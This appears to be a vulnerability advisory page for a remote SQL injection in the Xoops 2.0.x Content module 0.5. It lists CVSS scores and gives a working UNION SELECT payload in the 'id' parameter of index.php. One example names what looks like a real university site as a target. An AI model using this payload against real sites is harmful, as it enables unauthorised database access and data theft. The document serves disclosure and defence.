Xoops 2.0.x Module Content 0.5 SQL Injection

2009-12-21 / 2009-12-22
Credit: s4r4d0
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[+]Xoops 2.0.x Module Content [+]Donwload of Module:http://prdownloads.sourceforge.net/xoops/XOOPS2_mod_content-0.5.zip?download [+]Author: s4r4d0 [+]mail:s4r4d0@yahoo.com [+]TEAM: Fatal Error [+]Bug: Sql injection has been found in index.php [+]Exploit:http://www.site.com/modules/content/index.php?id=-1+UNION+SELECT+1,2,3,@@version,5,6,7,8,9,10,11-- [+]Example:http://www.ufmg.br/nej/modules/content/index.php?id=-1+UNION+SELECT+1,2,3,@@version,5,6,7,8,9,10,11-- [+]Greetz: Elemento_pcx - z4i0n - ir4 - sp3x - D3UX - veryn e Vympel [+]Made in BRazil [+]Reference:http://securityreason.com/exploitalert/7494

References:

http://xforce.iss.net/xforce/xfdb/54489
http://www.securityfocus.com/bid/37155
http://www.packetstormsecurity.org/0911-exploits/xoopscontent-sql.txt
http://securityreason.com/exploitalert/7494


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top